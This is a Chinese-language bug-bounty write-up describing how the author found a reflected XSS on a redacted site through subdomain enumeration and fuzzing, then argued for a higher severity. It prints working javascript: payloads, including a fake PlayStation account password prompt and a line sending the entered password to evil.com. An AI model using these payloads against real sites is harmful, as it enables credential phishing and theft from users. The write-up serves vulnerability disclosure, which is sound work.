2023年2月27日18:23:32评论28 views字数 2201阅读7分20秒阅读模式

如何通过反射型XSS获得2000美元的赏金

寻找反射型XSS

我通过执行垂直和水平子域枚举找到了一个独特的子域。我已经根据上述方法为子域枚举创建了我的 bash 脚本。

查看下面链接以了解子域名枚举。

https://sidxparab.gitbook.io/subdomain-enumeration-guide/types/horizontal-enumeration

唯一的子域是 accounts.example-website-test02.redacted.com' 当我试图访问这个子域时它会将我重定向到主域 www.redacted.com/login 所以我决定用 ffuf 模糊目录

在 Fuzzing 得到一个名为 launcher 的功能点之后，上面有一个带有许多隐藏功能的 JS 文件。

在 JS 文件中，我找到了一个名为 LinkPsn 的功能，我对其进行了递归模糊测试，并得到了一个名为conflict的参数，有一个包含继续按钮的页面，我在其中执行了参数模糊测试，并找出了 successRedirect 参数，该参数在单击弹出继续按钮警报。

实战 | 如何通过反射型XSS获得2000美元的赏金

我立即报告了这一点，我的报告被分类，但这里有一个转折！

工作人员将严重性更改为低并提供 500 美元的赏金我感到震惊，因为他们在低危漏洞上提供 500 美元，而在中危漏洞上他们提供 2000 美元。

工作人员回应

这是一个反射型 XSS，这意味着从中获得某些东西的唯一方法是通过网络钓鱼或类似的东西。出于这个原因，我们决定降低此问题的严重性。

The Reflected XSS comes under the Severity Medium (4 ~ 6.9)

所以我决定通过创建多个用例来展示影响。

攻击者可以通过多种方式诱使受害用户发出他们控制的请求，以传递反射的 XSS 攻击。这些包括将链接放置在攻击者控制的网站上，或放置在允许生成内容的另一个网站上，或者通过在电子邮件、推文或其他消息中发送链接。攻击可能直接针对已知用户，也可能是针对应用程序的任何用户的不分青红皂白的攻击

下面是我尽力展示此反射型 XSS 影响的不同案例。使用反射 XSS 我们可以做更多的事情，比如通过向受害者发送带有beef-hooked的 url 来控制受害者浏览器

案例 1：Hacked By xxx

payload：

javascript:document.getElementsByTagName(%60body%60)%5B0%5D.innerHTML=%60%3Ch1%3Ehacked%3C/h1%3E%60//

实战 | 如何通过反射型XSS获得2000美元的赏金

案例 2：窃取受害者密码发送到攻击者服务器

payload：窃取密码

javascript:document.getElementsByTagName('body')[0].innerHTML%20=%20'%3Cb%3ELink%20PlayStation%20Network%20Account%3C/b%3E%3C/br%3E%3C/br%3EVerify%20Your%20Password:%3Cinput%20type=%22password%22%20id=%22pwd%22%3E%3Cinput%20type=%22submit%22%20value=%22Link%20Account%22%20onclick=alert(document.getElementById(%22pwd%22).value)%3E'//

实战 | 如何通过反射型XSS获得2000美元的赏金

payload：向攻击者服务器发送密码

javascript:document.getElementsByTagName('body')[0].innerHTML = '<b>Link PlayStation Network Account</b></br></br>Verify Your Password:<input type="password" id="pwd"><input type="submit" value="Link Account" onclick=window.location.href="//evil.com?pwd="%2bdocument.getElementById("pwd").value>'//

实战 | 如何通过反射型XSS获得2000美元的赏金